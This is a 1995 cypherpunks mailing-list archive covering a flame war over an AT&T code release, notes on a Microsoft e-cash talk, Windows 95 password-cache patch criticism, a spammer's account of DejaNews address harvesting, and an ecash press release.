I'm from the part of the company that _spends_ money.  Other parts _make_
the money.

> And why do we tolerate Jeff Weinstein and Mat Blaze calling themselves
> cypherpunks, when they are so clearly just working us for their
> corporate interests?

Again, I think you're confused.  Jeff Weinstein works for Netscape, not
AT&T.  I think there's a connection between AT&T and Netscape somewhere
(like we bundle netscape with worldnet service), but I don't really
know the details.

> I wonder how much they get paid to monitor this list?

I can't speak for Jeff Weinstein, but in my case, not nearly enough.

-matt
"I'm from The Phone Company and I'm here to help you."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Tue, 19 Dec 95 17:49:53 PST
Subject: Re: revised time quantization package (Unix & WIN32) available
In-Reply-To: <199512192232.WAA18554@pangaea.ang.ecafe.org>
Message-ID: <Pine.SUN.3.91.951219193924.5644A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Dec 1995, ECafe Anonymous Remailer wrote:

> I don't understand why this group continues to tolerate these blatently
> commercial messages from att (and netscape.) (The message is
> really just an ad for the cryptolib product, as it says). I've also said
> this b4 but I'll say it again: why would anyone in their right mind trust
> binary code from att after the clipper fiasco.
> 

I don't understand why this group continues to tolerate these compleatly
stupid messages from Mr. Anonymous (and other nuts.) (The message is
really just a llame by Detweller (sp?), as it indicates). I've also said
this b4 but I'll say it again: why would anyone in their right mind pay any
attention to an anonymous idiot without enough face to get a nym.

> And why do we tolerate Jeff Weinstein and Mat Blaze calling themselves
> cypherpunks, when they are so clearly just working us for their
> corporate interests? I wonder how much they get paid to monitor this
> list?
> 
> 

You might want to have a doctor help you take your head out of your ass.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 19 Dec 95 17:08:15 PST
To: dcsb@ai.mit.edu
Subject: King Kong Does e$
Message-ID: <v02120d03acfd0a819ff2@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

King Kong Does e$

A while back, when the Microsoft Network hype was at its height, I
forwarded a bunch of articles to www-buyinfo entitled "Oh, No, there
goes Tokyo", about how Godzilla, in the form of Microsoft's Microsoft
Network, was going to stomp all over Tokyo, in the form of the net.
This was before I found out that Netscape's codeword for their Navigator
HTML Browser was "Mozilla".

So, along comes the following on the DCSB list, courtesy of the esteemed
Mr. Lethin:

        Wednesday,  December 13, 1995
        Refreshments 4:15 PM 4:30 - 6:00 PM
        Bartos Theater, E15-070 MIT Media Lab
        Ames Street, Cambridge, MA, USA
        Electronic Money Made Easy
        Dan Simon
        (dansimon@microsoft.com)


Mac in hand, I went to a presentation at the Media Lab's basement
auditorium, and proceed to transcribe his copious overheads, sans
graphics, as fast as my fingers could fly...

Which I present here in it's raw form, with a few corrections, his
cryptic (ahem...) source citations, viz: (cf., MN 93), and the
ocassional note I could cram in when he stopped flipping charts...

Oh, no, there goes Zurich...

- --------------------

Dan Simon Microsoft, now,
Quantum Computing/crypto in Canada before...

Characteristics of cash
        Portable
        Anonymous
        Confidential
        Easily and instantly transferrable
        Owned by those posessing it
        Hard to counterfiet
        Has multiple interchangeable forms.

What isn't cash: e-credit
        Non-anonymous
        Severely limited confidentiality
        Complicated payment protocols two parties and both their respective
        banks involved
        Ownership determined by record-keeping credit/debit authority

What isn't e-cash: offline e-cash
        One desirable feature of cash: transfer without an intermediary
        Problem: doublespending: restore prespending state, respend the same
        cash
        Tracing re-spent cash useless if it was stolen (cf. (cfnII 0091, Yac94,
        etc)
        Tamperproof hardware isn't (cf EGY83)
        Can broadcast small amounts over the net at a huge payoff. Result cash
        as secure cellphone codes (better not be worth much...)

Offline Electronic "bills" don't work. Too big for offline
Offline Electronic coins do work. Easy to counterfiet, not much profit.

(He is interested in electronic banknotes, on-line bearer securities, in
other words)

What can we assume:

        Customers, merchants, banks may wish to transact via many different
        possible media: telephone, Internet, cable network,
        smartcard/terminal, etc. etc.

        If a customer wants a transaction to be anonymous, then an anonymous
        medium must be used (no callerid on the telephone, anonymous remailer,
        etc)

A Modest Proposal
        On-line cash issued by banks owned by a possessor,
        Cryptographically hard to counterfiet
        Cash ownership transferred with bank's help
        aAnonymity of payer, payee based on anonymity of communication medium
        No individual account or prior trust relationship necessary to use a
        bank's cash
        (cf., MN 93)

Formal Security
        E-cash schemes generally described as a set of individual protocols
        (payer-payee, payer-bank, etc.( with intuitively described goals)
        But formal proof of security really requires a model of a full network,
        to consider general attacks, and explicit, formal security goals
        Previous examples:
        (BEA91/MR/91) for computation
        (RS93) for anonymity,
        (BR93) for authentication

What does it look like
        A bank issued banknote has a serial number,amount, and treasuer's
        signature
        It also has an associated "secret" which can be checked against the
        serial number, but can't be gotten from the serial number
        Its owner is whoever has the secret...
        ...but when the issuing bank gets the secret, the banknote is no longer
        valid.
        Publish the bank notes as broken, banknotes no longer valid.

(spiffy graphic elided)

        Customer chooses secret s, serial number n, n=h(s) and amount.
        Customer pays bank (by any method) the amount of the desired banknote
        bank signs serial number and amount
        Transaction may be anonymous (physical cash purchase at bank) pick
        serial number, bank uses private signature to sign the serial number.

(May's  train-locker applies)

How is change made:
        Customer generates secrets, serial numbers and amounts for smaller
        banknotes
        Customer gives bank the secret for the large banknote, and serial
        numbers and amounts for smaller ones
        Bank signs serial numbers and amounts, stores the secret for large
        now-invalid banknote
        Transaction can be completely anonymous.

How is it used for payment
        Payer simply gives bank note to payee by handing over the secret
        payee immediately exchanges the banknote for new ones anonymously, if
        desired
        Old banknote is now invalid, since bank has its secret; hence payer
        can't respend it
        If the bank note is already invalid, bank rejcts exchange and informs
        payee.
        "In effect, these are disposable banknotes"

"the simple way to get around exploding banknote numbers, issue it with
an expiry date."

Estimated outstanding certificates numbers would then be within the
storage capacity of a bank. (per a crony in the Bank of Japan)

Public key from the bank is needed to keep the bank honest.

"miracle of one-way function" (shuts down clueless question...)

Model
        Synchronous network of parties, some dishonest, one of them is the
        bank
        Parties can exchange messages anonymously
        Responder can always broadcast
        Parties and bank keep track of balances each round, a party receives
        instruction to deposit/withwdraw/ a unit value coin to/from the bank or
        pay a coin to another party
        (missed one point..)

Security goals
        Correctness: if all parties are honest, then instructions result in
        correct new balances
        Integrity: parties cannot be ripped off
        Honest bank never accepts more coins than have been withdrawn
        Party can detect dishonest bank
        Anonymity: information available to any coalition should be
        indistinquishable for any sequence of instructions consistent with the
        starting and ending points of distinguised coins entering/leaving
        coalition
        Weak anonymity, contends that that's what we have with serial numbered
        physical notes anyway
        Can make stronger with subsequent anonymous change operations at a
        bank...
        (can also buy with cash at a desk, also on the net with another form of
        digital cash ;-)
        Efficiency: cost of security should grow slowly (polylog at worst) with
        size of network.

Convenience Features
        Only payer, payee, issuing bank involved in transaction
        Each validation and transfer immediate
        Portable
        Easy to handle
        Expiry dates can be added.
        If anonymous withdrawl, then can get lost money back on expiry date, if
        coins weren't cashed.

Security
        Digital signature makes cash unforgeable
        Online validation prevents double spending
        Secrecy of secret preserved even if serial number publically available
        Bank's *only* secret is its private signature key
        Digital signature publicly commits bank to redeeming its e-cash; hence
        customers need not have special trust relationship with bank.

Audience Q: Borenstein's scenario.
A: bad problem. someone can split bank private keys, for instance
(No problem, strawman, what happens when someone breaks Ft. Knox?... --RAH ;-)

Extra features
        Payee can have the e-cash non-anonymously deposited in bank account for
        easier handling and better security (bank as back up)
        Payer can include transaction details with payment package or hide them
        in the secret (to create transaction record to be archived by, for
        example, by the bank) helpful in dispute.

"Secure payments" and E-cash
        "Don't send cash in the mail" even if it gets there, receiver need not
        admit it
        One solution: secure payment protocols (Microsoft/Visa STT)
        Non-anonymous: transaction details attached to payment mediated by
        payer's credit card issuer
        Payee can delay response and batch process transactions

"Secure Payments"
        Protocol's basic idea: payer sends encrypted package to payee giving
        credit card number and transaction details, "payment instructions".
        Only acquirer can read it
        Valid credit card number plus payer's digital signature assure
acquirer
        that payment is legitimate
        (missed one point)

Secure ecash payments
        Payer substitutes ecash secrets for credit card number in payment
        instruction package payment desiring ecash settlement.
        Includes ecash serial numbers amounts when sending package to acquirer
        E-cash issuing bank bank checks validity of ecash payment and exchanges
        it for merchant as apprpriate by signing serial numbers, amounts
        Instant payment, no bad debt


Questions
        Where is the communications cost/ security tradeoff?
        Solutions to dine and dash problem with dishonest bank (anonymity must
        broken to nark on the bank) (cf Cle85)?
        Efficient offline anonymous micropayments solutions?
        Implimentation pitfalls?

- -------------------

So, there are my notes, such as they are...

I walked away from this thinking that on-line cash covers a multitude of
sins:

        You can stick any "secret" into digital cash as long as it's unique
        and you trust the bank to keep it.

        If bank signs the secret they've shared with you and reveal it
        before some expiry date, they can be put out of business, because
        they've blown their reputation.

        If they claim that you've not shared a secret, you expose the secret
        and their signature, same happens.

        If you put an expiry date on Simon's digital cash, you don't have
        to keep track of it all.

        If you have an expiry date on Simon's cash, if you loose it, you
        can tell the bank, and if it's not cashed by the expiry date they
        can give you your money back.

        There's a distinction between on-line "banknotes", which are
        valuable enough to forge, and off-line "coins", which are not.

Simon has a system which has just enough anonymity to be economically
useful, but not perfect enough to keep the truly paranoid happy. Must be
something in the water in Redmond. Essentially, the bank becomes a
quasi-anonymous "line" in what's normally a peer-to-peer transaction.
Takes getting used to.

He's got a web page with all of this in gory detail, I bet, and his
e-mail address is at the top of this post.



Speaking of micropayments, Mark Manasse, Ron Rivest, Adi Shamir, and
Silvio Micali did another talk on Friday which touched on several cool
micropayment schemes, and a much more cost-effective way to do key
revocation. Though I got there exactly 6 minutes late, I missed one
presentation, and didn't take any notes for the rest. Hope someone else
here did. I saw lots of DCSB/Cypherpunks there... Any takers?

Cheers,

Bob Hettinga






-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNdbfvgyLN8bw6ZVAQH7qwP9GKSx7BegCr5lAOmG6lBo4OYgCPUO9j8N
bqf89b46rTkYrTkSB2DDX7BG/wu4nv/pnf7rA7UBHJjydZuiAVG9KplzevUWFoaI
xVeW8AoVPgKvkZsELK4VrrOayAXNxX9FBX7vGwsedl1SjQgyA3Qo62799GOIDrpQ
xuXYtTtaTfw=
=LQk+
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Tue, 19 Dec 95 16:45:46 PST
To: perry@piermont.com
Subject: Re: revised time quantization package (Unix & WIN32) available
In-Reply-To: <199512192349.SAA25296@jekyll.piermont.com>
Message-ID: <199512200051.TAA17476@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry wonders:

> What I want to know is, why are you doing this? Are you trying to
> start a flame war? Are you just an asshole? Are you Detweiler? Whats
> the motive?

I must admit I don't quite get it, although I think there are people
who really can't distinguish between a person and a person's employer, and
who believe that the entire world is a black-and-white battle between
good and evil.

Jeff Weinstein got treated rudely back during the feeding frenzy
where everyone hated Netscape because he works for Netscape.

Brian Davis got treated rudely when he first joined the list because
he works for the government as a federal (?) prosecutor.

I get treated rudely from time to time because I work for AT&T.

It doesn't bother me, especially when it comes from an anonymous source who
for all we know might earn his or her keep by advertising the joys of
smoking cigarettes to small children or by testing the toxic effects of
new cosmetics on cute, furry animals.  I figure it all just comes with
the turf.  At least I don't get blood thrown on my by protestors the way
people who work in animal testing labs do...

-matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 19 Dec 95 18:30:57 PST
To: jirib@cs.monash.edu.au
Subject: Re: What ever happened to... Cray Comp/NSA co-development
Message-ID: <acfcb5260c0210047aff@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:22 AM 12/20/95, Jiri Baum wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Hello,
>
>tcmay wrote:
>...
>> Prime Factoring? Primes are easy to factor, of course. (Hint: Every prime
>> has two factors.)
>...
>
>Can someone enlighten me as to what the two factors are?
>
>With sensible definitions I've heard you either get one (just itself)
>or four (itself [p], both units [1,-1] and the co-whatsitsname [-p]).


You're looking too deeply. My point was in response to the very common
error people make in talking about "factoring a large prime number." A
prime is actually easy to factor: itself and 1, which is the point I was
making.

(One can quibble about whether 1 is a factor...I include it, though 1 is
admittedly not considered a prime. But this is a quibble, I think.)

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 19 Dec 95 20:07:51 PST
To: cypherpunks@toad.com
Subject: Update on Microsoft .PWL and SMB Spin Control
In-Reply-To: <c=US%a=_%p=msft%l=RED-72-MSG951211115528QX007C00@red-01-msg.itg.microsoft.com>
Message-ID: <Pine.ULT.3.91.951219193256.8207C@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I was thinking about copying this to Yves and Yusuf, but I figure it 
will get to them anyway.

The WinNews #22 mass mailing (by the way, there seems to have been no
#21) has this to say about the .PWL bug: 

 NEW POSTINGS TO WINDOWS 95 WEB SITE AND FORUMS 

  * Under "WINDOWS 95 SOFTWARE LIBRARY"
      * In "Windows 95 Updates"
  
          - "Enhanced Password Cache Security Update" - an 
  enhanced security component that substantially strengthens
  the encryption used for the Microsoft Windows 95 password
  cache.

The update comes with no ReadMe -- it's a self-contained installer only.
No details on how it works appear to be available anywhere. There seems
to be no way to ensure that you have received a patch without viruses or
other modifications. I will not recommend or distribute this archive to
anyone until these problems are fixed. 

I also just noticed how WinNews #19 was censored:

 Free Software

  "Updated Drivers for Windows 95 File and Printer Sharing" - has a single 
  readme. The files are self-extracting executables located at: 
  FreeSoftware|Windows 95 Updates

The correct name for this page and patch is "Updated Drivers for Windows
95 File and Printer Sharing Security Issue." WinNews gave no indication
what this patch did. 

A "WinNews Special Issue" with some details on the SMB bug (including
incorrect information that has been quietly corrected, but not retracted
on WinNews or elsewhere) was sent to at least some WinNews subscribers in
late October. This "Special Issue" is not archived on Microsoft's Web
site, however -- it's the only issue that isn't. 

One month, ten days after the Windows 95 Product Manager assured me that
they would be made available "within two weeks," there are still no
international versions of the SMB or C$ security patches available on
Microsoft's Web site. All non-English copies of Win95 are still
vulnerable. 

Most of the major PC magazines are going to carry something on the SMB 
and .PWL bugs next month. Windows Magazine's story is going to be 
unambiguously positive:

  In response to a posting on the Internet questioning the security of
  Windows 95's optional password caching feature, Microsoft immediately 
  recommended that concerned users turn off password caching. Microsoft
  has now released a free update to Windows 95 that substantially 
  increases security.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNeLII3DXUbM57SdAQErKQQA3WuAAnphzOt8zZQP/wwMoUL2qt9ZocDd
9ozHfKW8FBwnLktQXMGfCIXpNPFqWlM2NtPeci7pcN4DdcyR463aTeKSEEe60fJD
tpnBJBztlGYSTOlMyxJiI+nFCBodkAG0NRA9GkHi6gAW9Rds3tZW9VTozvQq+2Ba
2F9BrVbwass=
=co1m
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 19 Dec 95 17:28:54 PST
To: rah@shipwright.com
Subject: Re:  King Kong Does e$
Message-ID: <9512200125.AA06259@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Speaking of micropayments, Mark Manasse, Ron Rivest, Adi Shamir, and
>Silvio Micali did another talk on Friday which touched on several cool
>micropayment schemes, and a much more cost-effective way to do key
>revocation. Though I got there exactly 6 minutes late, I missed one
>presentation, and didn't take any notes for the rest. Hope someone else
>here did. I saw lots of DCSB/Cypherpunks there... Any takers?

A reference for Mark's paper on Millicent is
    <a href="http://www.w3.org/pub/Conferences/WWW4/Papers/246/">The Millicent
	Protocol for Inexpensive Electronic Commerce</a>
Of all the various payment protocols I've seen, this was one of the few
that studied the available protocol bandwidth before designing a protocol.
Folks with an engineering slant should appreciate the work here.

I would be VERY interested in URL's and summaries of Micali's talk.
(I really wanted to go but after spending most of the week at the WWW4
conference I had to commit serious time to being anchored to the office.)
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Tue, 19 Dec 95 17:44:21 PST
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: What ever happened to... Cray Comp/NSA co-development
In-Reply-To: <199512200022.LAA28002@sweeney.cs.monash.edu.au>
Message-ID: <Pine.A32.3.91.951219204204.34882E-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Dec 1995, Jiri Baum wrote:

...
> Can someone enlighten me as to what the two factors are?
...
In this country, children are taught that prime numbers indeed have two 
factors: 1 and themselves.  I suspect its a cultural difference.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
"If what Proust says is true, that happiness is the absence of fever, then
I will never know happiness. For I am possessed by a fever for knowledge,
experience, and creation."                                      -Anais Nin
PGP Encrypted Mail Welcomed      Finger samman@powered.cs.yale.edu for key
Want to give a soon-to-be college grad a job?         Mail me for a resume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 19 Dec 95 21:08:53 PST
To: cypherpunks@toad.com
Subject: (fwd) Junk email address collection (from a junk emailer)
Message-ID: <Pine.ULT.3.91.951219210009.8207F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Personally, I think anyone who uses dejanews as a way to grep Usenet is
an idiot, but since this idiot actually did spend several hours doing so,
and then sent unsolicited commercial email to several thousand people,
it's worth listening to him. 

Of course he's wrong about DejaNews having anything to do with Stanford.
Anyone know anyone there?

This guy is obviously afraid of me. It's a pretty funny story, actually. 
Too bad I can't tell it to anyone.

- -rich

- ---------- Forwarded message ----------
From: Name Witheld by Request
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Important info for you

Rich,

There is one more point I would like to make to you.  Since you have
recently responded in a sincere way regarding everything I have asked you
about, I would like to return the favor and suggest some things that might
be of help to you and your cause.

If you want to put a damper on some of the random unsolicited emailings to
newsgroups members, I would like to tell you how.

I have done extensive marketing research online, and I am very involved
with Internet commerce and everthing that affects it.  Just like you have
your "circles" of associates, so do online business people.  I have met a
lot of business users online, and have learned the ins and outs of things
related to Internet commerce and marketing.

Anyway, in these "circles" of discussions, and seeing information and posts
from some of these business people, I have learned many things that your
group is most likely not exposed to.

For example, there is a major resource where the majority of email names
are stripped from, and I would like to reveal it to you, and give you the
solution to putting an end to it.  But only because I truly want to help,
and show you that I am not your enemy.

You may already know some of this.  The "Deja News" Web service (at
Stanford) is one of the major resources that some of these mailers use to
get names.  They attempt to do target marketing by doing searches for
keywords related to their customers, or their own, advertising material
that they wish to send.

They simply do a search for several words like "resumes" if they have
something to do with a resume service, etc.  I'm sure you get the idea.
After they do their search, they merely dump screen after screen of the
search engine's findings and then strip the addresses using a FIND-CONTAINS
"@" command in any database program.  This is how they strip the names to
create a mass email list.

There is ONE way that could really screw over these mailers from using this
resource.  This is inside information that has been revealed to me (I have
also seen references to it somewhere else).  Don't ask who it was that was
telling everyone about it, because I honestly couldn't tell you - I just
know it is going around.

Since you are there at Stanford, I am sure that you may be able to bring
this information to someone working on this project so they can make some
necessary changes.

Here it is:

When one of these mailers goes to do a search (and from what I hear, many
of them do it on regular intervals to get new names) they cannot do a TERSE
search. Why?  Because it cuts off the email addresses if you notice the
output.  They cannot obtain addresses from this data.

So what do they do?  They do a VERBOSE search and this way the email
addresses are completely listed.

Make a change to this VERBOSE search option so that it will only list the
partial email address, and you will eliminate THOUSANDS, if not millions of
unwanted email messages on the Net.

I guarantee if they made this change to the site it would make a HUGE
difference.  From what I hear, most newsreaders only list news post lists
by "author" and not by email address, so these companies cannot easily
strip names through regular newsgroup programs, and must use a service
(like Deja News) to compile large email lists.

Also, you and your buddies may want to look into a guy selling a software
program called "Floodgate."  Apparently this person is selling a program
for about $300 that is designed to strip names from text files that are
created from copying the output of other sources.

Just thought I would donate some helpful information to make up for my offense.

I don't mind if you should share this info with your contacts and if you
tell them that it came from me, however, I would prefer if you would not
post this information or statement publicly.  I do not wish to get involved
with a MAJOR uprising of business people that would murder me for revealing
stuff like this.

If I come across some other stuff which may be of interest to you, I will
let you know.  I think it is much better for us to work together instead of
against one another.

Let me know what you think,

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNeZ3Y3DXUbM57SdAQE/5QP/cwqEiY7eX8fR/9JEPmSdhE63Ax+H+NCw
Uac9VXlKKSH3e+JfI7c/+sWhYafLvWVFlz7Ikj1/uMilAmNJjJTUZfTHqdlYKN/+
kkmc+cCWfGAkl6PFcFqcvSdPKJvyVMsnUFufFBsl629Ot7Pb8yZJTXEq0vr8+BcG
QOdMuhEZiXk=
=Hq1v
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 19 Dec 95 22:00:54 PST
To: "Vinod Valloppillil" <vvallopp@eniac.seas.upenn.edu>
Subject: Re: cyphernomicon FTP site?
Message-ID: <m0tSH6U-00090OC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:18 PM 12/19/95 -0500, you wrote:
>Anyone know where I can FTP a full copy of the cyphernomicon?
>
>------------------------------+-----------------------------------------------
>Vinod Valloppillil            | LibertarianismTelecommunicationsFreeMarketEnvi 
>Engineering/Wharton           | ronmentalismTechnologyCryptographyElectronicCa
>University of Pennsylvania    | shInteractiveTelevisionEconomicsPhilosophyDigi
>vvallopp@eniac.seas.upenn.edu | talPrivacyAnarchoCapitalismRuggedIndividualism
>------------------------------+-----------------------------------------------


I'm interested in this too.  I really HATE those silly HTML documents that
can't (or, at least, I haven't yet figured out how) be downloaded in one
swell foop.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Dec 95 21:50:23 PST
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION PIONEERS PRIVATE ELECTRONIC COMMERCE
Message-ID: <199512200544.VAA16051@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


For Immediate Release - December 20, 1995
Contact: Sameer Parekh sameer@c2.org 510-601-9777

COMMUNITY CONNEXION PIONEERS PRIVATE ELECTRONIC COMMERCE 

Community ConneXion today announced a new service for its customers
which will make secure, private electronic commerce more accessible to
all merchants, from the small single-person business to large
corporations trying to sell goods and services over the
world-wide-web.

The new service allows its customers to accept ecash, an anonymous,
secure electronic payment system, developed by DigiCash bv, of
Amsterdam, Holland and implemented with US Dollars by Mark Twain Bank,
of St. Louis, Missouri. Customers can setup web pages on their web
sites and charge websurfers from pennies to dollars per page when
viewing their sites. The technology allows anyone on the Internet to
become a merchant, selling goods and services electronically.

Community ConneXion's President, Sameer Parekh, commented on the new
development, "Before we unveiled this service, it was rather difficult
for a merchant to offer content on the web in exchange for private,
secure payment. Our system allows our customers to add simple
configuration directives to their web pages in order to start charging
for them." Information about Community ConneXion's ecash merchant
support is available on their webserver at http://www.c2.org/ecash/.

Ecash is the only strongly private payment system available on the net
today. "All other consumer payment systems on the net are strongly
linked with the old-fashioned and outdated credit card system," said
Parekh. Ecash provides full payor anonymity and protects against fraud
using strong cryptographic protocols developed by David Chaum,
Managing Director of DigiCash.

"Community ConneXion continues to lead the world toward a more
efficient model of commerce on the Internet" said Frank Trotter, III,
Mark Twain Bank International Markets Division Director and Ecash
project leader.  "Integration of an Ecash payment mechanism into the
site is a giant step toward allowing business and research to function
and support itself efficiently.  We look forward to the continued
leadership in innovation from Community ConneXion."

Community ConneXion has been a supporter of ecash since its inception
in October of 1995, becoming the first internet provider in the world
to start accepting ecash as payment for services, less than one month
after the payment system was announced. 

Community ConneXion, founded in June of 1994, is the leading provider
of privacy on the Internet. They provide anonymous and pseudonymous
internet access and web pages in addition to powerful web services,
virtual hosts, and web design consultation. Information is available
from their web pages at http://www.c2.org/. Information about the Mark
Twain Bank ecash release is available from
http://www.marktwain.com/ecash.html.

DigiCash and ecash are trademarks of DigiCash bv. Mark Twain Bank is a
trademark of Mark Twain Bancshares.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Tue, 19 Dec 95 20:28:21 PST
To: Matt Blaze <mab@crypto.com>
Subject: Re: revised time quantization package (Unix & WIN32) available
In-Reply-To: <199512200051.TAA17476@crypto.com>
Message-ID: <Pine.OSF.3.91.951219222236.16364A-100000@francis.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



Matt,

It seems that .pm has to be paranoid since he doesn't recognize intergrity. 
May he is the famous net loon LD?

However, keep up the good work.

Dan 

On Tue, 19 Dec 1995, Matt Blaze wrote:

> Perry wonders:
> 
> > What I want to know is, why are you doing this? Are you trying to
> > start a flame war? Are you just an asshole? Are you Detweiler? Whats
> > the motive?
> 
> I must admit I don't quite get it, although I think there are people
> who really can't distinguish between a person and a person's employer, and
> who believe that the entire world is a black-and-white battle between
> good and evil.
> 
> Jeff Weinstein got treated rudely back during the feeding frenzy
> where everyone hated Netscape because he works for Netscape.
> 
> Brian Davis got treated rudely when he first joined the list because
> he works for the government as a federal (?) prosecutor.
> 
> I get treated rudely from time to time because I work for AT&T.
> 
> It doesn't bother me, especially when it comes from an anonymous source who
> for all we know might earn his or her keep by advertising the joys of
> smoking cigarettes to small children or by testing the toxic effects of
> new cosmetics on cute, furry animals.  I figure it all just comes with
> the turf.  At least I don't get blood thrown on my by protestors the way
> people who work in animal testing labs do...
> 
> -matt
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Tue, 19 Dec 95 14:30:34 PST
To: cypherpunks@toad.com
Subject: Re: revised time quantization package (Unix & WIN32) available
Message-ID: <199512192232.WAA18554@pangaea.ang.ecafe.org>
MIME-Version: 1.0
Content-Type: text/plain


AT&T Spokesman Matt Blaze writes:
blah blah
>There are (basically) no restrictions on the use or distribution
>of the (very simple) code.

This is simply untrue. Read the fine print in the file. Use this code
and you owe them big. They'll "reach out and touch" you big time.
If they were serious, they'd gpl it.

>Get it from:
>	ftp://research.att.com/dist/mab/quantize.shar
>
>The quantize package is also part of Jack Lacy's cryptolib package
>(watch this space for details).

I don't understand why this group continues to tolerate these blatently
commercial messages from att (and netscape.) (The message is
really just an ad for the cryptolib product, as it says). I've also said
this b4 but I'll say it again: why would anyone in their right mind trust
binary code from att after the clipper fiasco.

And why do we tolerate Jeff Weinstein and Mat Blaze calling themselves
cypherpunks, when they are so clearly just working us for their
corporate interests? I wonder how much they get paid to monitor this
list?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael H. Warfield <mhw@wittsend.com>
Date: Tue, 19 Dec 95 19:36:57 PST
To: perry@piermont.com
Subject: Re: revised time quantization package (Unix & WIN32) available
In-Reply-To: <199512192349.SAA25296@jekyll.piermont.com>
Message-ID: <m0tSFM0-0002StC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger enscribed thusly:

> ECafe Anonymous Remailer writes:
> [Lots of garbage slandering Matt Blaze, who's about as close to being
> a dyed-in-the-DNA cypherpunk as you can get.]

	Yeah!  Really!  We're talking about Matt "Honey I broke the
chip" Blaze here.  Single handedly did more damage to the clipper
chip than any other individual or group!

> What I want to know is, why are you doing this? Are you trying to
> start a flame war? Are you just an asshole? Are you Detweiler? Whats
> the motive?

	Perry, I liked your reaction to the last chump like this
much better.

	We should find out what drugs they are taking and where we can
buy some!  They are obviously VERY good considering that they no longer
have any connection with reality.

	I'm just impressed that they can manage to find their keyboard
with the halucinations they're having!

> .pm

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@SmallWorks.COM (Jim Thompson)
Date: Tue, 19 Dec 95 21:23:45 PST
To: cypherpunks@toad.com
Subject: Re: revised time quantization package (Unix & WIN32) available
Message-ID: <9512200523.AA24870@hosaka.smallworks.com>
MIME-Version: 1.0
Content-Type: text/plain



>AT&T Spokesman Matt Blaze writes:
>blah blah
>>There are (basically) no restrictions on the use or distribution
>>of the (very simple) code.
>
>This is simply untrue. Read the fine print in the file. Use this code
>and you owe them big. They'll "reach out and touch" you big time.

You're wrong.

Direct from the shar file:

X/*
X * Simple Unix time quantization package
X * {mab,lacy}@research.att.com
X * v1.0 - 12/95
X *
X * WIN32 port v0.1 fod@brd.ie 12/95
X *
